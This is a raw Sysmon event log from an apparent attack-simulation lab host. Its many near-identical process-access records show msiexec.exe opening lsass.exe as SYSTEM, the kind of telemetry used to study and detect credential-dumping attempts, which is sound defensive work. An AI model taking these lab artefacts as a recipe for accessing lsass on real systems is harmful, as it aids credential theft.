10341000x80000000000000002691276Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691275Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691274Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691273Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691272Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691271Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691270Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691269Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691268Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691267Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691266Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691265Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691264Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691263Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691262Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691261Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691260Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691259Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691258Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691257Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691256Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691255Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.522{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691254Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 